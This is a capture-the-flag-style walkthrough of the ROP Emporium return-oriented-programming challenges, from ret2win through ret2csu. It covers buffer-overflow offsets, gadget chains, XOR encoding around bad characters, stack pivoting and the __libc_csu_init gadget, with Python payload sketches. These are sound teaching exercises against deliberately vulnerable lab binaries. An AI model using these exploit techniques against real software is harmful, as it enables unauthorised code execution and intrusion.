ROP Emporium is a series of challenges designed to introduce fundamental return-oriented programming (ROP) techniques. When a program has a buffer overflow vulnerability but its stack is marked non-executable with the NX bit (i.e., you cannot execute data on the stack), ROP allows us to chain existing snippets of instructions (so-called gadgets) in the program image to achieve what we want. I will be using GDB + pwndbg and pwntools for the write-up. Although not necessary, I also use debuginfod for GNU libc debug information. You can also find the complete Python scripts for each challenge here. After the first challenge, I will omit the code for finding the offset of the stored RIP and sending the payload since it stays the same.
Before You Start
If you haven’t yet, consider reading the beginners’ guide on the ROP Emporium website first to get a taste of common tools and techniques for ROP.
ret2win
ret2win is a simple buffer overflow challenge with a twist.
Investigation
Let’s check out the binary in gdb first with gdb ret2win:
There are no protections in this challenge except NX, which means that we have to use ROP.
The main function simply prints messages and calls pwnme().
pwnme() is a bit longer. We can see that at the beginning of the function (<+8>), only 0x20 bytes are allocated for the buffer. Later, pwnme() uses read() to take input without limiting it to the size of the buffer, which makes it vulnerable to a buffer overflow.
Taking a quick look in radare reveals that there is a ret2win() function that we should return to.
In case you need a refresher on the stack layout, here’s what our buffer overflow attack will look like on the stack: the input will overwrite the buffer and saved rbp with garbage values and set the return address of pwnme() to ret2win() (0x400756 in the image).
Build the Payload
We are now ready to craft the payload, which consists of padding (garbage values for the buffer and the saved rbp on the stack) and the return address. To find the exact number of characters needed for the padding (the “offset”), we can use cyclic from pwntools to generate a de Bruijn sequence and use cyclic -l (or cyclic_find() in Python) to calculate the offset from the captured rip.
We found a segfault
Crash the program with a cyclic pattern:
We found the offset pattern:
In the disassembly, we can see that we have set the return address to 0x6161616c6161616b using the cyclic sequence. We only need the first 4 bytes to find the offset. Since x86-64 is little-endian and the least significant bytes are stored first, these are the low 4 bytes of the value, 0x6161616b.
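As a rough sketch of what cyclic -l does with the captured value, the lookup can be reproduced with the standard library alone. The pattern below is assumed to be the first 48 bytes of pwntools' default cyclic sequence (lowercase alphabet, subsequence length 4); offset_from_rip is a name made up for this illustration.

```python
import struct

# Assumption: first 48 bytes of the default pwntools cyclic pattern,
# i.e. what `cyclic 48` prints.
PATTERN = b"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaa"

def offset_from_rip(captured: int, pattern: bytes = PATTERN) -> int:
    """Return the pattern offset of the bytes that landed in the return address."""
    # The CPU read the 8 bytes as a little-endian integer, so packing the
    # integer back with "<Q" recovers the byte order of the original input.
    raw = struct.pack("<Q", captured)
    # The first 4 bytes in memory are enough to identify the position.
    return pattern.find(raw[:4])

offset = offset_from_rip(0x6161616C6161616B)
print(offset)  # 40
```

The result matches the layout described earlier: 0x20 bytes of buffer plus 8 bytes of saved rbp.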
This process of finding the offset can be automated using pwnlib (pwntools) in Python. Here’s the relevant code borrowed from GitHub:
To build the payload, we can use p64() to pack an address as a 64-bit little-endian pointer:
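For readers without pwntools at hand, here is a minimal stand-in for p64() built on struct. It assumes an offset of 40 (which is what the cyclic value 0x6161616b corresponds to in the default pattern) and uses the ret2win() address from the stack diagram.

```python
import struct

OFFSET = 40          # assumed: padding needed to reach the saved return address
RET2WIN = 0x400756   # address of ret2win() as shown in the stack diagram

def p64(value: int) -> bytes:
    """Pack an integer as a 64-bit little-endian value, like pwntools' p64()."""
    return struct.pack("<Q", value)

# Padding for the buffer and saved rbp, then the new return address.
payload = b"A" * OFFSET + p64(RET2WIN)
print(payload[OFFSET:].hex())  # 5607400000000000
```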
Alternatively, pwnlib provides a convenient function flat() for building payloads, which can look up the offset with cyclic_find() and packs addresses for you. Note that for functions imported from a shared library, elf.symbols.<symbol> gives the address of the PLT stub, not the function’s actual runtime address.
Stack Alignment
For now we can save the payload to a file and check if it works in gdb:
Turns out it doesn’t:
Here we can see the infamous movaps instruction:
RSP is not 16-byte aligned:
From the screenshots above we see that the payload did work, but the program crashed at the movaps instruction. With a quick search we find that movaps requires its memory operand to be 16-byte aligned, and the compiled code assumes that the stack pointer is 16-byte aligned (ends in 0x0) at that point. We can quickly fix this by adding another address before the ret2win() address, since each address is an 8-byte pointer and we are 8 bytes off. To ensure that no side effects are produced, we can use a ret gadget in the binary (a gadget is a contiguous sequence of instructions that ends in ret, jmp, call, etc. so that you can chain several of them together to do what you want). The ret gadget does nothing other than pop the next address on the stack into RIP.
ropper -f ret2win:
Our updated payload with the addition of the ret gadget:
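The effect of the extra ret on alignment can be checked with a little arithmetic. This is only a sketch: RET_GADGET and the stack address are hypothetical placeholders, and the helper names are made up. Under the System V x86-64 ABI a function expects rsp % 16 == 8 on entry, as it would be right after a call.

```python
import struct

OFFSET = 40
RET2WIN = 0x400756       # from the stack diagram
RET_GADGET = 0x40053E    # hypothetical placeholder: use the address ropper reports

def build_payload(align: bool) -> bytes:
    chain = [RET2WIN]
    if align:
        # One extra 8-byte slot, consumed by the lone ret before ret2win().
        chain.insert(0, RET_GADGET)
    return b"A" * OFFSET + b"".join(struct.pack("<Q", a) for a in chain)

def rsp_at_entry(rsp_at_pwnme_ret: int, payload: bytes) -> int:
    """rsp when ret2win() starts: every ret consumes one 8-byte chain slot."""
    slots = (len(payload) - OFFSET) // 8
    return rsp_at_pwnme_ret + 8 * slots

SAVED_RIP_SLOT = 0x7FFFFFFFE018  # hypothetical stack address, 8 mod 16

misaligned = rsp_at_entry(SAVED_RIP_SLOT, build_payload(align=False)) % 16
aligned = rsp_at_entry(SAVED_RIP_SLOT, build_payload(align=True)) % 16
print(misaligned, aligned)  # 0 8
```

Without the ret gadget, ret2win() starts with rsp 8 bytes away from what a normal call would produce, which is what later trips movaps.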
Our payload works:
Automated Exploitation
While we could just write the payload to a file and send it to the program through stdin, it does get a bit annoying when you are testing things. From now on, we can keep writing the file for debugging purposes but use pwnlib’s utilities to start a process. As we have already done this when automating the offset-finding process, this will look pretty much the same:
You can view the complete script here.
split
Call system()
The pwnme() function can be exploited the same way with a buffer overflow.
pwnme() decompilation:
We don’t have a simple ret2win() function anymore, but the program does import system() from libc, which can be used to print the flag.
Function list in radare2:
Simply returning to system() wouldn’t work, since it requires a command as an argument. Under the x86-64 System V calling convention, arguments are passed through registers (more information here). The first argument is stored in rdi, so we just need to find a gadget to set rdi. Looking at ropper output, we find pop rdi; ret; which does exactly what we want. To use the gadget, simply add the gadget address to the payload followed by the data to be popped.
Setter gadget in ropper:
We still need the actual string. Fortunately, the challenge binary already contains the string /bin/cat flag.txt in the .data section:
Command string found in split:
Payload & Solution
We can use the same code to find the offset for the return address. After some quick testing, we find that this binary also suffers from the same movaps stack alignment issue, which can be resolved with a ret gadget. In addition, instead of using the address of the command string from the rabin2 output, we can use pwnlib’s built-in search function to make the code a bit more readable. Note that pwnlib has built-in ROP tools, but I prefer sticking to flat() since in future challenges we won’t be able to find straightforward gadgets anymore.
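A standard-library sketch of the resulting chain may help make the layout concrete. Every address here is a hypothetical placeholder, and data_section is a stand-in for the bytes of .data; the string lookup only mimics what pwnlib's search does.

```python
import struct

def p64(value: int) -> bytes:
    return struct.pack("<Q", value)

# Hypothetical placeholders: take the real values from ropper / rabin2.
OFFSET = 40
RET = 0x40053E          # lone ret, for stack alignment
POP_RDI = 0x4007C3      # pop rdi; ret
SYSTEM_PLT = 0x400560   # PLT stub of system()
DATA_BASE = 0x601050    # load address of the stand-in .data bytes below

# Stand-in for the section contents; the real bytes come from the binary.
data_section = b"\x00" * 16 + b"/bin/cat flag.txt\x00"
cmd_addr = DATA_BASE + data_section.index(b"/bin/cat flag.txt")

chain = [
    RET,         # fix the 8-byte misalignment
    POP_RDI,     # pop the next slot into rdi
    cmd_addr,    # first argument: pointer to the command string
    SYSTEM_PLT,  # system("/bin/cat flag.txt")
]
payload = b"A" * OFFSET + b"".join(p64(entry) for entry in chain)
print(hex(cmd_addr), len(payload))
```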
We are now ready to feed the program our payload:
View the complete solution here.
callme
The callme challenge requires us to call three functions (callme_{one,two,three}()) in sequence and pass the same three arguments to each (0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d), which basically means that we need to find gadgets that let us set the three registers used for passing arguments. You can find the complete solution below.
Which Registers?
We have the same buffer overflow vulnerability in pwnme().
As for the function calls, we can open libcallme.so in gdb to check what arguments the functions accept and from which registers. The three registers used in order are rdi, rsi, and rdx.
Building the Payload
Run ropper -f callme and we find a convenient gadget that sets all three registers at once:
Since the arguments will be popped off the stack in order, the payload is simple:
- popper gadget
- argument 1 (0xdeadbeefdeadbeef)
- argument 2 (0xcafebabecafebabe)
- argument 3 (0xd00df00dd00df00d)
- callme_one()
- popper gadget
- argument 1 (0xdeadbeefdeadbeef)
- argument 2 (0xcafebabecafebabe)
- argument 3 (0xd00df00dd00df00d)
- callme_two()
- popper gadget
- argument 1 (0xdeadbeefdeadbeef)
- argument 2 (0xcafebabecafebabe)
- argument 3 (0xd00df00dd00df00d)
- callme_three()
To build the payload:
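Since the same five-entry block repeats three times, a loop keeps the chain short. The sketch below uses only the standard library; the gadget and PLT addresses are hypothetical placeholders, while the argument values are the ones given by the challenge.

```python
import struct

OFFSET = 40
# Hypothetical placeholders: take the real addresses from ropper and the PLT.
POP_RDI_RSI_RDX = 0x40093C   # pop rdi; pop rsi; pop rdx; ret
CALLME = {"one": 0x400720, "two": 0x400740, "three": 0x4006F0}
ARGS = (0xDEADBEEFDEADBEEF, 0xCAFEBABECAFEBABE, 0xD00DF00DD00DF00D)

chain = []
for name in ("one", "two", "three"):
    # popper gadget, the three arguments in pop order, then the function
    chain += [POP_RDI_RSI_RDX, *ARGS, CALLME[name]]

payload = b"A" * OFFSET + b"".join(struct.pack("<Q", entry) for entry in chain)
print(len(chain), len(payload))  # 15 160
```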
View the complete code here.
write4
For write4, we have to print the flag using the print_file() function from the shared object. However, this time the binary doesn’t just contain a "flag.txt" string out of nowhere. We will have to write the string to memory ourselves. The code for exploiting pwnme() and sending the payload is exactly the same as the one we used before.
Write Gadget
We need a write gadget that lets us write bytes somewhere in memory so that we can pass that address to the print function. We know from the challenge page that a write gadget generally looks like mov [dest_reg], src_reg, where we write the value in src_reg to an address in dest_reg. Let’s start looking for them in ropper output.
Found a write gadget:
Popper to use with the write gadget:
write8
With the gadget we found, we can easily write the entirety of the argument ("flag.txt", 8 bytes = 64 bits) into memory. The next question is where. One of the most reliable options is the .data section, where global and static variables are kept (I tried the stack and it didn’t work).
.data is writable and large enough:
Here’s the payload:
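The shape of such a chain, sketched with the standard library. All addresses are hypothetical placeholders, and the pop order of the popper gadget (destination first, then source) is an assumption; adjust it to whatever ropper shows.

```python
import struct

def p64(value: int) -> bytes:
    return struct.pack("<Q", value)

# Hypothetical placeholders, not taken from the binary.
OFFSET = 40
POP_DEST_SRC = 0x400690   # pop <dest_reg>; pop <src_reg>; ret (order assumed)
WRITE = 0x400628          # mov [dest_reg], src_reg; ret
POP_RDI = 0x400693        # pop rdi; ret
DATA = 0x601028           # writable address inside .data
PRINT_FILE = 0x400510     # PLT stub of print_file()

# "flag.txt" is exactly 8 bytes, so it fills one stack slot as-is.
filename = b"flag.txt"
as_qword = struct.unpack("<Q", filename)[0]

chain = b"".join([
    p64(POP_DEST_SRC), p64(DATA), p64(as_qword),  # dest = DATA, src = "flag.txt"
    p64(WRITE),                                   # store the 8 bytes at DATA
    p64(POP_RDI), p64(DATA),                      # first argument = DATA
    p64(PRINT_FILE),                              # print_file("flag.txt")
])
payload = b"A" * OFFSET + chain
print(hex(as_qword))  # 0x7478742e67616c66
```

Note that the gadget writes exactly 8 bytes and no terminator, so this relies on the byte after the string in .data already being zero.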
View the complete code here.
badchars
In badchars, we find that not all bytes are acceptable as input. To bypass the badchars, we need to configure the ROP gadget finder to skip them, encode the filename using XOR, and then decode it in memory.
It’s XORing Time
Finding bad chars:
Using ropper with badchars option (hex-encoded):
Encoders like shikata ga nai use many techniques to avoid bad characters, but for our purposes we can just use plain XOR. Time to find some xor gadgets:
I can’t find pop rdx, so I guess we are stuck with the first XOR gadget.
With these, we can control the first XOR gadget:
Here we find a write gadget:
We can use this to set print_file()’s argument (rdi):
One approach to avoiding the bad chars is to XOR the data ("flag.txt") with a single byte before putting it in the payload and then XOR it against the same byte in memory using our ROP chain. While doing so, we have to make sure that everything in the ROP chain is badchar-free, meaning that we need to find the right key through trial and error. Since our gadget XORs one byte at a time, we need eight iterations for the entirety of the filename.
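The trial and error can be automated. The sketch below assumes the bad characters are x, g, a and . purely for illustration (use the set the binary actually reports), and 0x601028 is a hypothetical starting address; the helper names are made up.

```python
import struct

BADCHARS = b"xga."   # assumed for illustration

def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)

def is_clean(blob: bytes, badchars: bytes = BADCHARS) -> bool:
    return not any(b in badchars for b in blob)

def find_key(data: bytes) -> int:
    """First single-byte key that is clean itself and yields clean output."""
    for key in range(1, 256):
        if is_clean(bytes([key])) and is_clean(xor_bytes(data, key)):
            return key
    raise ValueError("no single-byte key avoids the bad characters")

def find_base(start: int, length: int) -> int:
    """First address >= start where every per-byte target address is clean."""
    base = start
    while not all(is_clean(struct.pack("<Q", base + i)) for i in range(length)):
        base += 1
    return base

key = find_key(b"flag.txt")
encoded = xor_bytes(b"flag.txt", key)
base = find_base(0x601028, len(encoded))   # hypothetical .data address
print(key, encoded, hex(base))
```

With these assumptions the address has to move because one of the eight per-byte target addresses would otherwise contain 0x2e, which is the "." character.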
Building Payload with a Loop
This took me quite some time to get right, but basically I had to shift the string address and try different keys to get the filename to decode correctly.
View the complete code here.
fluff
For fluff we have to combine some random instructions to get a write gadget.
where gadgets
Hmm. Nothing useful here.
Let’s check out the hint:
So we have some gadgets that are not so straightforward. After reading the documentation for xlat, bextr, and stos, we find that they can indeed be combined to create a write gadget:
bextr rbx, rcx, rdx
- We can use this to set rbx for the next gadget, xlat.
- Bits are extracted from rcx (2nd operand) to rbx (1st operand).
- We need to subtract 0x3ef2 to offset the add instruction at <+4>.
- The lower 8 bits (dl) of rdx (3rd operand) are treated as the starting bit index, and the next 8 bits (dh) specify the number of bits to extract.
- We can basically set rdx[7:0] to 0 and rdx[15:8] to 64 in order to simulate mov rbx, rcx.
xlat byte ptr [rbx] (xlatb)
- This uses al to index a table at [rbx] and copy a byte to al. Basically mov al, byte ptr [rbx + al].
- We need to find an address that has the byte we need to write. This address is equal to rbx + al.
- As for setting the source address, we could zero al, but we don’t have enough space (only 0x200) for mov eax, 0 gadgets.
- We actually don’t need to zero al since we know the initial value of rax (return value of puts("Thank you!") which is 0xb).
- Save al after each write. For future calls, al will be the last byte we wrote to memory.
- Now that we know the value of al, we can just subtract the last al value from rbx (rcx) for each call. If our desired byte is at addr, then rbx = addr - al and rbx + al == addr.
stos byte ptr [rdi], al (stosb byte [rdi], al)
- This is equivalent to mov byte ptr [rdi], al, followed by advancing rdi by one (assuming the direction flag is clear).
- We use this in conjunction with xlat to achieve write-what-where.
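To check the arithmetic before touching the binary, the three instructions can be modelled in plain Python. This is a simulation sketch, not the exploit: IMAGE and BASE are stand-ins for the binary's bytes and load address, and the function names are made up. The 0x3ef2 constant and the initial al of 0xb come from the notes above.

```python
MASK64 = (1 << 64) - 1
ADD_CONST = 0x3EF2            # added to rcx before bextr
BEXTR_CTL = (64 << 8) | 0     # length 64 in bits 15:8, start index 0 in bits 7:0

# Stand-ins: any readable bytes that contain every character of "flag.txt".
BASE = 0x400000
IMAGE = b"libfluff.so\x00print_file\x00.text\x00.data\x00.got\x00"

def bextr(src: int, ctl: int) -> int:
    start, length = ctl & 0xFF, (ctl >> 8) & 0xFF
    return (src >> start) & ((1 << length) - 1) & MASK64

def plan_rcx(target: bytes, al: int) -> list:
    """rcx value to pop for each byte so that xlat loads exactly that byte."""
    values = []
    for byte in target:
        addr = BASE + IMAGE.index(bytes([byte]))      # where the byte lives
        values.append((addr - al - ADD_CONST) & MASK64)
        al = byte                                     # xlat leaves it in al
    return values

def simulate(rcx_values: list, al: int) -> bytes:
    written = bytearray()
    for rcx in rcx_values:
        rcx = (rcx + ADD_CONST) & MASK64              # add rcx, 0x3ef2
        rbx = bextr(rcx, BEXTR_CTL)                   # bextr rbx, rcx, rdx
        al = IMAGE[((rbx + al) & MASK64) - BASE]      # xlatb
        written.append(al)                            # stosb, rdi moves on by 1
    return bytes(written)

plan = plan_rcx(b"flag.txt", al=0xB)
print(simulate(plan, al=0xB))  # b'flag.txt'
```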
Craft the Write Gadget
…And Build the Payload
Building the payload is pretty trivial now that we have the write-bytes gadget.
View the complete code here.
pivot
For pivot we have to make two payloads, one for the stack and the other for the heap.
Why do we need to pivot?
While the pivot binary artificially creates the demand, there are often situations in which we do not have enough space on the stack to fit the entire ROP chain without messing up the buffer overflow. If we somehow leak a heap address from the vulnerable program and can write there, it is possible to pivot to the heap and put the rest of the payload there.
How do I pivot?
To pivot, simply set rsp to the heap address you got so that instructions such as pop and ret now take values from the heap.
How do I ret2win()?
The basic idea is to load the GOT entry of foothold_function() and add an offset to get ret2win(). Finding the address of the GOT entry can be done through rabin2 -R pivot.
You can determine the offset between foothold_function() and ret2win() in gdb.
pivot does not import ret2win():
We can determine the function address difference at runtime:
Notice how GDB doesn’t need the GOT to give you the addresses? Since foothold_function() isn’t called during normal program flow, its GOT entry has not been resolved yet, so GDB probably calculated these addresses from the shared library’s symbols.
Alternatively, determine function address difference using shared library:
Exploiting
To set rsp, we use the xchg gadget to swap rsp and rax. The first thing we do after we reach the heap ROP chain is call foothold_function() so that its GOT entry gets resolved. Then we load the address stored in the GOT entry, add the offset to it to get ret2win(), and call it.
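A sketch of the two pieces of arithmetic involved: the stack-side stage that performs the pivot, and the offset added to the resolved foothold_function() address. Everything numeric is a hypothetical placeholder, and the pop rax gadget is an assumption (the write-up only names the xchg gadget).

```python
import struct

def p64(value: int) -> bytes:
    return struct.pack("<Q", value)

# Hypothetical placeholders; read the real values from ropper, rabin2 and gdb.
OFFSET = 40
POP_RAX = 0x4009BB         # pop rax; ret (assumed to exist)
XCHG_RSP_RAX = 0x4009BD    # xchg rsp, rax; ret
FOOTHOLD_OFF = 0x96A       # offset of foothold_function() in the shared library
RET2WIN_OFF = 0xA81        # offset of ret2win() in the shared library
DELTA = RET2WIN_OFF - FOOTHOLD_OFF

def stack_stage(heap_addr: int) -> bytes:
    """Small first stage: load the leaked address into rax, then swap it into rsp."""
    return b"A" * OFFSET + p64(POP_RAX) + p64(heap_addr) + p64(XCHG_RSP_RAX)

def ret2win_from_got(resolved_foothold: int) -> int:
    """What the heap chain computes once the GOT entry has been resolved."""
    return resolved_foothold + DELTA

stage1 = stack_stage(0x7F0000001000)             # made-up leaked address
target = ret2win_from_got(0x7F000020096A)        # made-up resolved address
print(len(stage1), hex(DELTA), hex(target))
```

The offset is independent of where the library is loaded, which is why it can be measured once in gdb or from the library file and reused.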
View the complete code here.
ret2csu
In ret2csu we are given a universal gadget to call the ret2win() function with arguments. For more details on the gadget, see ret2csu.
Universal Gadget
I was pretty lost trying to find suitable gadgets, so naturally I read the last paragraph on the challenge page, which hints that there is a “universal ROP” gadget in __libc_csu_init. It is called “universal” since programs linked against a glibc version that still provides __libc_csu_init will contain this gadget. The csu (“C Start-Up”) functions help libc set up programming language features (like constructors, transactional memory model, etc.). When a C program starts, __libc_csu_init gets called first to set things up, then main(), and finally __libc_csu_fini to tear things down (see __libc_csu_init). Let’s take a look at the gadget:
We can see that using the instructions at <+64> and <+67> we can set the rdx and rsi registers indirectly through r15 and r14, which we also have control over (<+96>). One thing is that this gadget only lets us set edi, which doesn’t fit an entire 64-bit argument, but we can easily find a pop rdi; ret gadget elsewhere. There are, however, two real issues with this gadget that can be fixed with a bit of planning.
- We have to give call at <+73> an address that contains the address of a gadget that does not affect rdx or rsi. So the gadget’s address has to be stored in the binary somewhere for us to use it. This practically limits us to pre-existing symbols in the binary.
- We have to make sure that rbp and rbx are equal, otherwise the gadget will jump somewhere else at <+84>.
Issue One
To solve issue one, we would have to find a gadget that both has minimal side effects and whose address is stored in the program image itself. One candidate is the _fini symbol:
Pwnlib will help us find a location containing the address of _fini in the binary:
We have to make sure that the memory at r12 + rbx * 8 holds the address of _fini for the call instruction. Setting r12 to the location we just found (the one containing the address of _fini) and rbx = 0 will work.
Issue Two
Since we control rbp (<+91>), we can easily bypass the jne instruction by setting rbp to the anticipated value of rbx. Knowing that we set rbx to zero and <+77> increments rbx by one, we can just set rbp to 1.
Bringing everything together
Our payload will start at <+90> to set up the registers we need, after which we ret to <+64> to set up the arguments for ret2win(). After bypassing the jne we encounter an add rsp, 0x8, which is equivalent to a pop, so we need to add a garbage value in the payload. We then find ourselves back in the same place where we set up all the registers, but this time we just have to give them garbage values to reach the ret. Remember that with this gadget we only get to set edi, so we need to ret to a pop rdi; ret gadget. Now that all three argument registers are initialized properly, we can ret to ret2win(). The payload is as follows:
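Laid out slot by slot, the chain described above could look like the following standard-library sketch. Every address is a hypothetical placeholder, the offset of 40 is assumed to carry over from the earlier challenges, and the three argument values are assumed to be the same ones used in callme.

```python
import struct

def p64(value: int) -> bytes:
    return struct.pack("<Q", value)

# Hypothetical placeholders; take the real values from gdb, ropper and pwnlib.
OFFSET = 40
CSU_POP = 0x40069A    # <+90>: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
CSU_CALL = 0x400680   # <+64>: mov rdx, r15; mov rsi, r14; mov edi, r13d; call [r12 + rbx*8]
FINI_PTR = 0x600E48   # location whose contents are the address of _fini
POP_RDI = 0x4006A3    # pop rdi; ret
RET2WIN = 0x400510
ARG1, ARG2, ARG3 = 0xDEADBEEFDEADBEEF, 0xCAFEBABECAFEBABE, 0xD00DF00DD00DF00D  # assumed
JUNK = 0

chain = [
    CSU_POP,
    0,          # rbx = 0, so the call target is read from [r12]
    1,          # rbp = 1, equal to rbx after the increment, so jne falls through
    FINI_PTR,   # r12: pointer to the address of _fini
    JUNK,       # r13 -> edi (only 32 bits, fixed up later)
    ARG2,       # r14 -> rsi
    ARG3,       # r15 -> rdx
    CSU_CALL,
    JUNK,       # consumed by add rsp, 0x8
    *[JUNK] * 6,  # second pass through the six pops
    POP_RDI, ARG1,
    RET2WIN,
]
payload = b"A" * OFFSET + b"".join(p64(entry) for entry in chain)
print(len(chain), len(payload))  # 18 184
```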
View the complete code here.